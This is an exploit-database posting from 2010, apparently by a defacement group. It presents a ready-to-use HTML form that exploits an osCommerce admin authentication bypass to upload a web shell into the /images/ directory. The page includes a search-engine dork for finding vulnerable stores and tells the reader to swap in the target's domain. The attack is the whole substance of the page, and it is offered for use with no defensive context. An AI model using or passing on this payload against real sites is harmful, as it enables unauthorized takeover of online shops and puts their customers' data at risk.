[webapps / 0day] - Oscommerce (script) /images/ Remote File
Posted on 30 November 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Oscommerce (script) /images/ Remote File Upload Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Oscommerce (script) /images/ Remote File Upload Vulnerability by Hackeri-AL in webapps / 0day | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>============================================================= Oscommerce (script) /images/ Remote File Upload Vulnerability ============================================================= ################################################################# Author : Hackeri-AL Contact : h-al [at] hotmail [dot] it Greetz : 1337db.com, LoocK3D & b4cKd00r ~ & GHoST61 & BaDBoy My Group : UAH-Crew = United Albania Hackers ################################################################# [~] DORK: inurl:"powered by oscommerce" or inurl:index.php?cPath= ----------------------------------------------------------------- [~] sript By Hackeri-AL : ----------------------------------------------------------------- <html> <head> <title>By Hackeri-AL</title> </head> <body> <div style="text-align: center;"><big style="color: rgb(253, 0, 0);"><big><big>Powered By Hackeri-AL<br> </big></big></big><span style="color: rgb(102, 102, 102);"><br> (best defacer United Albania Hackers)</span><br> </div> <big style="font-weight: bold; color: rgb(253, 0, 0);"><big><br> Oscommerce script : Remote File Upload in /images/</big></big><br> <form name="new_product" action="http://WEB.COM/admin/categories.php/login.php?cPath=&action=new_product_preview" method="post" enctype="multipart/form-data"><br> <input name="products_image" type="file"><br> <input name="submit" value=" Save " type="submit"><br> <big style="font-weight: bold; color: rgb(253, 0, 0);"><big><br> shell here:</big></big><br> Using upload File : <a href=http://WEB.COM/admin/images/product_info.php>site/</>ath</>/images/product_info.php</a></font></body></form> </body> </html> ----------------------------------------------------------------- Explanation : ----------------------------------------------------------------- Find in script : action="http://WEB.COM/admin/categories.php/login.php?cPath=&action=new_product_preview and edit WEB.COM in site that will upload the shell. Find and : Using upload File : <a href=http://WEB.COM/admin/images/product_info.php>site/</>ath</>/images/product_info.php for edit WEB.COM in site that will upload the shell. #################################################################### [~] Proud 2 be Albania [~] Proud 2 be Muslim [~] United States of Albania #################################################################### # <a href='http://1337db.com/'>1337db.com</a> [2010-11-30]</pre></body></html>
